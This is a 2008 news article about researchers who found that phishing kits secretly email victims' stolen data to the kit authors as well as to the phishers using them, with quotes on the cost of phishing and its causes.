Feeds

Bank scammers scammed, says security researcher

Hacking tools nick nicked data

Secure remote control for conventional and virtual desktops

Many of the people behind identity theft scams are themselves having data stolen from them in the process, a security researcher has revealed.

Phishers, who trick online banking users into typing in their details to fake sites, use tools in the process which have built-in security holes for others to access the data that many do not have the technical skills to spot, according to a security researcher.

Nitesh Dhanjan will next week tell the Black Hat security conference in Washington of the results of his and his colleague Billy Rios's immersion in the world of phishers. He told OUT-LAW Radio of his findings this week.

Dhanjani claims that most phishers are far from the technical sophisticates of the popular imagination. Most, he said, use pre-written phishing kits that take little skill to operate.

"What you see in [the kits] is ready made phishing sites," he said. "All the research we've done is just basically what you can do from a web browser without even crossing the line where it's called hacking."

Dhanjani said it was extremely easy to come across details that had been stolen just hours previously. "Within 15 minutes of starting this research we were staring at people's bank accounts and credit card numbers and ATM PIN numbers posted on international message boards," he said.

But the authors of the phishing kits are using more junior phishers to do the work for them. Dhanjani said when he and Rios, who both work for un-named major corporations, looked at the computer code in the kits, they found that it had two different instructions commanding the system to email a victim's details.

"We realised that in the second mail command there was a hard coded email address that the victim's information was also going to," said Dhanjani. "So unbeknown to the phisher deploying this kit, his information from the victim is going to him in addition to the author who wrote this kit, so there you have a phisher phishing a phisher."

Gartner estimated that phishing scams cost $3.2bn in 2007, and there are significant costs over and above the money lost because it is often very difficult and time consuming for people to prove that they were not responsible for spending in their name.

Dhanjani said that there is no easy fix to the problem. He said that until banks and governments have more sophisticated systems than just simple credit card or government identity numbers the problem will continue.

He said, though, that the cost of changing those systems was greater than the sums currently being lost, meaning the systems are unlikely to change soon.

Copyright © 2008, OUT-LAW.com

OUT-LAW.COM is part of international law firm Pinsent Masons.

Secure remote control for conventional and virtual desktops

More from The Register

next story
'Regin': The 'New Stuxnet' spook-grade SOFTWARE WEAPON described
'A degree of technical competence rarely seen'
You really need to do some tech support for Aunty Agnes
Free anti-virus software, expires, stops updating and p0wns the world
Regin: The super-spyware the security industry has been silent about
NSA fingered as likely source of complex malware family
You stupid BRICK! PCs running Avast AV can't handle Windows fixes
Fix issued, fingers pointed, forums in flames
Privacy bods offer GOV SPY VICTIMS a FREE SPYWARE SNIFFER
Looks for gov malware that evades most antivirus
Patch NOW! Microsoft slings emergency bug fix at Windows admins
Vulnerability promotes lusers to domain overlords ... oops
HACKERS can DELETE SURVEILLANCE DVRS remotely – report
Hikvision devices wide open to hacking, claim securobods
prev story

Whitepapers

Why cloud backup?
Combining the latest advancements in disk-based backup with secure, integrated, cloud technologies offer organizations fast and assured recovery of their critical enterprise data.
Forging a new future with identity relationship management
Learn about ForgeRock's next generation IRM platform and how it is designed to empower CEOS's and enterprises to engage with consumers.
How to determine if cloud backup is right for your servers
Two key factors, technical feasibility and TCO economics, that backup and IT operations managers should consider when assessing cloud backup.
Reg Reader Research: SaaS based Email and Office Productivity Tools
Read this Reg reader report which provides advice and guidance for SMBs towards the use of SaaS based email and Office productivity tools.
Security and trust: The backbone of doing business over the internet
Explores the current state of website security and the contributions Symantec is making to help organizations protect critical data and build trust with customers.